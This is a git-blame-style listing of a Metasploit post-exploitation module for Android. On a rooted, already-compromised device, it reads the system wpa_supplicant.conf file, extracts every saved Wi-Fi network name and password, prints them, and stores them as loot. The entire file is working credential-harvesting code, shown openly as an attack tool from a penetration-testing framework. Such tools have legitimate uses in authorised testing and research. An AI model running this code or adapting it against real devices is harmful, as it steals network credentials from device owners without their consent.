2018-04-30 19:02:30 +05:30
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
|
|
|
|
|
|
include Msf::Post::Common
|
|
|
|
|
include Msf::Post::File
|
2018-05-06 19:11:35 +08:00
|
|
|
include Msf::Post::Android::Priv
|
2018-04-30 19:02:30 +05:30
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
{
|
|
|
|
|
'Name' => 'Displays wireless SSIDs and PSKs',
|
|
|
|
|
'Description' => %q{
|
2018-04-30 19:02:30 +05:30
|
|
|
This module displays all wireless AP creds saved on the target device.
|
2023-02-08 13:47:34 +00:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => ['Auxilus', 'timwr'],
|
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
|
|
|
|
'Platform' => 'android'
|
|
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
)
|
2018-04-30 19:02:30 +05:30
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
2018-05-06 19:11:35 +08:00
|
|
|
unless is_root?
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('This module requires root permissions.')
|
2018-05-06 19:11:35 +08:00
|
|
|
return
|
2018-04-30 19:02:30 +05:30
|
|
|
end
|
|
|
|
|
|
2023-02-08 13:47:34 +00:00
|
|
|
data = read_file('/data/misc/wifi/wpa_supplicant.conf')
|
2018-05-06 19:11:35 +08:00
|
|
|
aps = parse_wpa_supplicant(data)
|
|
|
|
|
|
2018-05-02 19:09:36 +05:30
|
|
|
if aps.empty?
|
2023-02-08 13:47:34 +00:00
|
|
|
print_error('No wireless APs found on the device')
|
2018-05-02 19:09:36 +05:30
|
|
|
return
|
|
|
|
|
end
|
2018-05-01 22:58:17 +05:30
|
|
|
ap_tbl = Rex::Text::Table.new(
|
2023-02-08 13:47:34 +00:00
|
|
|
'Header' => 'Wireless APs',
|
|
|
|
|
'Indent' => 1,
|
|
|
|
|
'Columns' => ['SSID', 'net_type', 'password']
|
2018-05-01 22:58:17 +05:30
|
|
|
)
|
|
|
|
|
|
|
|
|
|
aps.each do |ap|
|
|
|
|
|
ap_tbl << [
|
2018-05-02 00:00:05 +05:30
|
|
|
ap[0], # SSID
|
|
|
|
|
ap[1], # TYPE
|
|
|
|
|
ap[2] # PASSWORD
|
2018-05-01 22:58:17 +05:30
|
|
|
]
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_line(ap_tbl.to_s)
|
2018-05-01 23:10:29 +05:30
|
|
|
p = store_loot(
|
|
|
|
|
'wireless.ap.creds',
|
|
|
|
|
'text/csv',
|
|
|
|
|
session,
|
|
|
|
|
ap_tbl.to_csv,
|
|
|
|
|
File.basename('wireless_ap_credentials.txt')
|
|
|
|
|
)
|
|
|
|
|
print_good("Secrets stored in: #{p}")
|
2018-04-30 19:02:30 +05:30
|
|
|
end
|
|
|
|
|
|
2018-05-06 19:11:35 +08:00
|
|
|
def parse_wpa_supplicant(data)
|
|
|
|
|
aps = []
|
|
|
|
|
networks = data.scan(/^network={$(.*?)^}$/m)
|
|
|
|
|
networks.each do |block|
|
2018-05-06 17:37:12 +05:30
|
|
|
aps << parse_network_block(block[0])
|
2018-05-06 19:11:35 +08:00
|
|
|
end
|
|
|
|
|
aps
|
2018-05-01 22:58:17 +05:30
|
|
|
end
|
|
|
|
|
|
2018-05-06 19:11:35 +08:00
|
|
|
def parse_network_block(block)
|
|
|
|
|
ssid = parse_option(block, 'ssid')
|
|
|
|
|
type = parse_option(block, 'key_mgmt', false)
|
|
|
|
|
psk = parse_option(block, 'psk')
|
|
|
|
|
[ssid, type, psk]
|
|
|
|
|
end
|
2018-05-02 19:09:36 +05:30
|
|
|
|
2018-05-06 19:11:35 +08:00
|
|
|
def parse_option(block, token, strip_quotes = true)
|
2023-02-08 13:47:34 +00:00
|
|
|
if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))
|
2018-05-06 19:11:35 +08:00
|
|
|
return result.captures[0]
|
2023-02-08 13:47:34 +00:00
|
|
|
elsif (result = block.match(/^\s#{token}=(.+)$/))
|
2018-05-06 19:11:35 +08:00
|
|
|
return result.captures[0]
|
2018-05-02 19:09:36 +05:30
|
|
|
end
|
2018-05-01 22:58:17 +05:30
|
|
|
end
|
2018-05-06 19:11:35 +08:00
|
|
|
|
2018-04-30 19:02:30 +05:30
|
|
|
end
|
